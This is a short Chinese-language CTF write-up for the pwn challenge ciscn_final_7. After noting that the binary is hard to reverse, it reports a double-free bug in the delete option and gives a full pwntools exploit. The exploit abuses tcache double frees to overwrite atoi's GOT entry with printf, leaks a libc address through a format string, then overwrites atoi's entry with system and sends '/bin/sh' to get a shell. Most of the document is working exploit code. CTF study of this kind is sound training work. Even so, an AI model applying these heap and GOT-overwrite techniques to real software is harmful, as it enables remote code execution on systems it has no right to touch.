ciscn_final_7(黑盒测试)
首先检查一下程序的保护机制
然后,我们用IDA分析一下
程序比较复杂
比较难逆向,其大致原理是fork了子进程做为一个调试进程,然后主进程里通过int 3中断通知调试器设置相应的寄存器,从而执行到其他地方。
由于整个程序主逻辑全部使用中断来实现,比较难逆向,因此我们直接黑盒测试了。
首先通过枚举choice的选项,得到了一下选项
#110 add
#120 edit
#238 del
#386 exit
然后就进行测试,发现del功能存在UAF,可以多次del,因此,这题就比较简单了。
#coding:utf8
from pwn import *
#sh = process('./ciscn_final_7',env={'LD_PRELOAD':'./libc-2.27.so'})
sh = remote('node3.buuoj.cn',27363)
libc = ELF('./libc-2.27.so')
elf = ELF('./ciscn_final_7')
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
#110 add
#120 edit
#238 del
#386 exit
def add(size,content):
sh.sendlineafter('command>>','110')
sh.sendlineafter('string:',str(size))
sh.sendlineafter('string:',content)
def add_s(size,content):
sh.sendlineafter('command>>','%110c')
sh.sendlineafter('string:','%' + str(size) + 'c')
sh.sendlineafter('string:',content)
def edit(size,new_content):
sh.sendlineafter('command>>','120')
sh.sendlineafter('string:',str(size))
sh.sendlineafter('string:',new_content)
def delete(index):
sh.sendlineafter('command>>','238')
sh.sendlineafter('string:',str(index))
add(0x20,'a'*0x20) #0
#double free
delete(0)
delete(0)
add(0x30,'b'*0x30) #1
delete(1)
delete(1)
add(0x20,p64(atoi_got)) #2
add(0x20,'c') #3
add(0x20,p64(printf_plt)) #4,修改atoi的got表为printf的plt
sh.sendlineafter('command>>','%25$p')
sh.recvuntil('0x')
#泄露地址
libc_base = int(sh.recvuntil('invalid choice',drop = True),16) - 0xE7 - libc.sym['__libc_start_main']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
add_s(0x30,p64(atoi_got)) #5
add_s(0x30,'d') #6
add_s(0x30,p64(system_addr)) #7 修改atoi的got表为system
#getshell
sh.sendlineafter('command>>','/bin/sh')
sh.interactive()